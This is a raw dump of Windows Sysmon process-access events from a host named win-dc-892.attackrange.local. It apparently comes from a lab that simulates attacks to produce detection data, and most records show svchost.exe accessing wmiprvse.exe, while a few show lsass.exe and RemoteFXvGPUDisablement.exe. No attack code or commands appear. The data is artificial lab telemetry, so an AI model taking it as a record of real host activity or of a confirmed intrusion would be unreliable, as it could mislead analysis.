12:00:50.518{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.518{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.518{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.518{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.502{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.502{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.502{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.502{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.502{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.502{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.487{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.487{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.487{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.487{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.487{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.487{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.471{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.471{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.471{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.424{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-1A00-00000000AE01}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.424{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-1A00-00000000AE01}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.409{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.409{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.409{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 